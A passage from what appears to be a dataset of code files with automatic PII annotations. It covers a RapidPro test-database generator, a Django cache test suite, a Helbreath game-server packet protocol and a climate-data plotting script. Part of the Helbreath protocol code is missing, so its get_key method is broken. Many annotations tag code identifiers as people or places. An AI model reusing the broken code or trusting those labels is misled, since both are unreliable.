+ with transaction.atomic(): + # make sure every org has an active flow + for org in orgs: + if not org.cache['activity']: + self.start_flow_activity(org) + + with transaction.atomic(): + org = self.random_org(orgs) + + if self.probability(0.1): + self.create_unsolicited_incoming(org) + else: + self.create_flow_run(org) + runs += 1 + + except KeyboardInterrupt: + self._log(""Shutting down...\n"") + break + + squash_channelcounts() + squash_flowpathcounts() + squash_flowruncounts() + prune_recentmessages() + squash_topupcredits() + squash_labelcounts() + + def start_flow_activity(self, org): + assert not org.cache['activity'] + + user = org.cache['users'][0] + flow = self.random_choice(org.cache['flows']) + + if self.probability(0.9): + # start a random group using a flow start + group = self.random_choice(org.cache['groups']) + contacts_started = list(group.contacts.values_list('id', flat=True)) + + self._log("" > Starting flow %s for group %s (%d) in org %s\n"" + % (flow.name, group.name, len(contacts_started), org.name)) + + start = FlowStart.create(flow, user, groups=[group], restart_participants=True) + start.start() + else: + # start a random individual without a flow start + if not org.cache['contacts']: + return + + contact = Contact.objects.get(id=self.random_choice(org.cache['contacts'])) + contacts_started = [contact.id] + + self._log("" > Starting flow %s for contact #%d in org %s\n"" % (flow.name, contact.id, org.name)) + + flow.start([], [contact], restart_participants=True) + + org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)} + + def end_flow_activity(self, org): + self._log("" > Ending flow %s for in org %s\n"" % (org.cache['activity']['flow'].name, org.name)) + + org.cache['activity'] = None + + runs = FlowRun.objects.filter(org=org, is_active=True) + FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED) + + def create_flow_run(self, org): + activity = org.cache['activity'] + flow = activity['flow'] + + if activity['unresponded']: + contact_id = self.random_choice(activity['unresponded']) + activity['unresponded'].remove(contact_id) + + contact = Contact.objects.get(id=contact_id) + urn = contact.urns.first() + + if urn: + self._log("" > Receiving flow responses for flow %s in org %s\n"" % (flow.name, flow.org.name)) + + inputs = self.random_choice(flow.input_templates) + + for text in inputs: + channel = flow.org.cache['channels'][0] + Msg.create_incoming(channel, six.text_type(urn), text) + + # if more than 10% of contacts have responded, consider flow activity over + if len(activity['unresponded']) <= (len(activity['started']) * 0.9): + self.end_flow_activity(flow.org) + + def create_unsolicited_incoming(self, org): + if not org.cache['contacts']: + return + + self._log("" > Receiving unsolicited incoming message in org %s\n"" % org.name) + + available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started'])) + if available_contacts: + contact = Contact.objects.get(id=self.random_choice(available_contacts)) + channel = self.random_choice(org.cache['channels']) + urn = contact.urns.first() + if urn: + text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES]) + Msg.create_incoming(channel, six.text_type(urn), text) + + def probability(self, prob): + return self.random.random() < prob + + def random_choice(self, seq, bias=1.0): + if not seq: + raise ValueError(""Can't select random item from empty sequence"") + + return seq[int(math.pow(self.random.random(), bias) * len(seq))] + + def weighted_choice(self, seq, weights): + r = self.random.random() * sum(weights) + cum_weight = 0.0 + + for i, item in enumerate(seq): + cum_weight += weights[i] + if r < cum_weight or (i == len(seq) - 1): + return item + + def random_org(self, orgs): + """""" + Returns a random org with bias toward the orgs with the lowest indexes + """""" + return self.random_choice(orgs, bias=self.org_bias) + + def random_date(self, start=None, end=None): + if not end: + end = timezone.now() + if not start: + start = end - timedelta(days=365) + + if start == end: + return end + + return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end))) + + def timeline_date(self, dist): + """""" + Converts a 0..1 distance into a date on this database's overall timeline + """""" + seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds() + + return self.db_begins_on + timedelta(seconds=(seconds_span * dist)) + + @staticmethod + def peak_memory(): + rusage_denom = 1024 + if sys.platform == 'darwin': + # OSX gives value in bytes, other OSes in kilobytes + rusage_denom *= rusage_denom + return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom + + def _log(self, text): + self.stdout.write(text, ending='') + self.stdout.flush() + + +class DisableTriggersOn(object): + """""" + Helper context manager for temporarily disabling database triggers for a given model + """""" + def __init__(self, *models): + self.tables = [m._meta.db_table for m in models] + + def __enter__(self): + with connection.cursor() as cursor: + for table in self.tables: + cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table) + + def __exit__(self, exc_type, exc_val, exc_tb): + with connection.cursor() as cursor: + for table in self.tables: + cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table) +",30703,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', ""c['district'].name""], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', ""org.cache['users'].append(user""], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']]" +87,"import unittest +import re +from nose.tools import eq_, ok_ +from django.test.client import RequestFactory +from django.core.cache import cache +from fancy_cache.memory import find_urls + +from . import views + + +class TestViews(unittest.TestCase): + + def setUp(self): + self.factory = RequestFactory() + + def tearDown(self): + cache.clear() + + def test_render_home1(self): + request = self.factory.get('/anything') + + response = views.home(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + # do it again + response = views.home(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_1, random_string_2) + + def test_render_home2(self): + authenticated = RequestFactory(AUTH_USER='peter') + request = self.factory.get('/2') + + response = views.home2(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + # do it again + response = views.home2(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_1, random_string_2) + + # do it again, but with a hint to disable cache + request = authenticated.get('/2') + response = views.home2(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + def test_render_home3(self): + request = self.factory.get('/anything') + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + eq_(random_string_1, random_string_2) + # the post_process_response is only called once + eq_(extra_random_1, extra_random_2) + + def test_render_home3_no_cache(self): + factory = RequestFactory(AUTH_USER='peter') + request = factory.get('/3') + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + ok_('In your HTML' not in response.content.decode(""utf8"")) + + def test_render_home4(self): + request = self.factory.get('/4') + + response = views.home4(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + + response = views.home4(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + eq_(random_string_1, random_string_2) + # the post_process_response is now called every time + ok_(extra_random_1 != extra_random_2) + + def test_render_home5(self): + request = self.factory.get('/4', {'foo': 'bar'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + request = self.factory.get('/4', {'foo': 'baz'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_2, random_string_3) + + def test_render_home5bis(self): + request = self.factory.get('/4', {'foo': 'bar'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + request = self.factory.get('/4', {'foo': 'baz'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_2, random_string_3) + + def test_remember_stats_all_urls(self): + request = self.factory.get('/anything') + response = views.home6(request) + eq_(response.status_code, 200) + + # now ask the memory thing + match, = find_urls(urls=['/anything']) + eq_(match[0], '/anything') + eq_(match[2]['hits'], 0) + eq_(match[2]['misses'], 1) + + # second time + response = views.home6(request) + eq_(response.status_code, 200) + match, = find_urls(urls=['/anything']) + eq_(match[0], '/anything') + eq_(match[2]['hits'], 1) + eq_(match[2]['misses'], 1) + + def test_remember_stats_all_urls_looong_url(self): + request = self.factory.get( + 'PI:KEY' + 'test/that/things/work/with/long/urls/too', + { + 'line1': 'Bad luck, wind been blowing at my back', + 'line2': ""I was born to bring trouble to wherever I'm at"", + 'line3': ""Got the number thirteen, tattooed on my neck"", + 'line4': ""When the ink starts to itch, "", + 'line5': ""then the black will turn to red"", + } + ) + response = views.home6(request) + eq_(response.status_code, 200) + + # now ask the memory thing + match, = find_urls() + ok_(match[0].startswith('/something/really')) + eq_(match[2]['hits'], 0) + eq_(match[2]['misses'], 1) + + # second time + response = views.home6(request) + eq_(response.status_code, 200) + match, = find_urls([]) + ok_(match[0].startswith('/something/really')) + eq_(match[2]['hits'], 1) + eq_(match[2]['misses'], 1) +",7974,"[['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']]" +88,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +# +# hb_balancer +# High performance load balancer between Helbreath World Servers. +# +# Copyright (C) 2012 Michał Papierski dummy@email.com + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. + +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . +# + +import struct +import random +import logging + +from twisted.internet import reactor +from twisted.protocols.stateful import StatefulProtocol +from twisted.python import log + +from packets import Packets + +class BaseHelbreathProtocol(StatefulProtocol): + ''' Basic Helbreath Protocol ''' + + def getInitialState(self): + ''' + Protocol overview: + [Key unsigned byte] [Size unsigned short] [Data Size-bytes] + ''' + return (self.get_key, 1) + + def get_key(self, data): + ''' Get key ''' + self.key, = struct.unpack(' 0: + # Decode + data = list(data) + for i in range(len(data)): + data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256) + data = ''.join(data) + + # Pass decoded data + self.raw_data(data) + + return (self.get_key, 1) + + def send_message(self, data): + ''' Send a Helbreath Packet data ''' + key = random.randint(0, 255) + if key > 0: + # Encode + data = list(data) + for i in range(len(data)): + data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256) + data = ''.join(data) + self.transport.write(struct.pack('_MM_YYYY.tif'. If sorted using base + Pythons sort/sorted functions, things will be sorted by the first char + of the month, which makes thing go 1, 11, ... which sucks for timeseries + this sorts it properly following SNAP standards as the default settings. + + ARGUMENTS: + ---------- + files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob. + split_on = [str] `str` character to split the filename on. default:'_', SNAP standard. + elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-2. For SNAP standard. + elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-1. For SNAP standard. + + RETURNS: + -------- + sorted `list` by month and year ascending. + + ''' + import pandas as pd + months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ] + years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ] + df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} ) + df_sorted = df.sort_values( ['year', 'month' ] ) + return df_sorted.fn.tolist() +def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ): + ''' + return new list of filenames where they are truncated to begin:end + + ARGUMENTS: + ---------- + files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob. + begin = [int] four digit integer year of the begin time default:1901 + end = [int] four digit integer year of the end time default:2100 + split_on = [str] `str` character to split the filename on. default:'_', SNAP standard. + elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-1. For SNAP standard. + + RETURNS: + -------- + sliced `list` to begin and end year. + ''' + import pandas as pd + years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ] + df = pd.DataFrame( { 'fn':files, 'year':years } ) + df_slice = df[ (df.year >= begin ) & (df.year <= end ) ] + return df_slice.fn.tolist() +def masked_mean( fn, bounds=None ): + ''' get mean of the full domain since the data are already clipped + mostly used for processing lots of files in parallel.''' + import numpy as np + import rasterio + + with rasterio.open( fn ) as rst: + if bounds: + window = rst.window( *bounds ) + else: + window = rst.window( *rst.bounds ) + mask = (rst.read_masks( 1 ) == 0) + arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask ) + return np.mean( arr ) + +if __name__ == '__main__': + import os, glob + import geopandas as gpd + import numpy as np + import xarray as xr + import matplotlib + matplotlib.use( 'agg' ) + from matplotlib import pyplot as plt + from pathos.mp_map import mp_map + import pandas as pd + import geopandas as gpd + + # args / set working dir + base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data' + os.chdir( base_dir ) + # scenarios = ['rcp60', 'rcp85'] + scenarios = ['historical'] + shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp' + shp = gpd.read_file( shp_fn ) + bounds = shp.bounds + + # models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4'] + # models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4'] + models = ['ts323'] + variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#, + # models = ['CRU_TS323'] + # begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]] + begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]] + + for scenario in scenarios: + for variables in variables_list: + for m in models: + for begin, end in begin_end_groups: # not fully wired-up yet + if m == 'ts323': + old_dir = 'PI:KEY' + # begin = 1950 + # end = 1965 + + else: + if scenario == 'historical': + old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models' + # begin = 1950 + # end = 1965 + else: + old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models' + # begin = 2095 + # end = 2100 + + figsize = (16,9) + out = {} + for v in variables: + path = os.path.join( base_dir,'downscaled', m, scenario, v ) + print( path ) + files = glob.glob( os.path.join( path, '*.tif' ) ) + files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v ] = mp_map( masked_mean, files, nproc=4 ) + if v == 'tas' or v == 'pr': + if m == 'ts323': + path = os.path.join( old_dir, v ) + print( path ) + else: + path = os.path.join( old_dir, scenario, m, v ) + + files = glob.glob( os.path.join( path, '*.tif' ) ) + files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 ) + + # nofix + path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v ) + print( path ) + files = glob.glob( os.path.join( path, '*.tif' ) ) + files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 ) + + plot_df = pd.DataFrame( out ) + plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' ) + + # sort the columns for output plotting cleanliness: + if 'tas' in variables: + col_list = ['tasmax', 'tas_old', 'tas', 'tasmin'] + elif 'pr' in variables: + col_list = ['pr', 'pr_old', 'pr_nofix'] + + plot_df = plot_df[ col_list ] # get em in the order for plotting + + if v == 'pr': + plot_df = plot_df.round()[['pr','pr_old']] + + # now plot the dataframe + if begin == end: + title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin ) + else: + title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end ) + + if 'tas' in variables: + colors = ['red', 'black', 'blue', 'red' ] + else: + colors = [ 'blue', 'black', 'darkred' ] + + ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors ) + + output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' ) + if not os.path.exists( output_dir ): + os.makedirs( output_dir ) + + # now plot the dataframe + out_metric_fn = 'temps' + if 'pr' in variables: + out_metric_fn = 'prec' + + if begin == end: + output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) ) + else: + output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) ) + plt.savefig( output_filename, dpi=400 ) + plt.close() + + + + + +# # # PRISM TEST VERSION DIFFERENCES # # # # # # # +# import rasterio +# import numpy as np +# import os, glob, itertools + +# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism' +# variables = [ 'tmax', 'tmin' ] + +# for variable in variables: +# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) ) +# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) ) + +# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ]) +# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ]) + +# out = olds - news +# out[ (olds == -9999.0) | (news == -9999.0) ] = 0 + +# uniques = np.unique( out ) +# uniques[ uniques > 0.01 ] +",9041,"[['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', ""'year'""], ['DATE_TIME', ""'month'""], ['LOCATION', 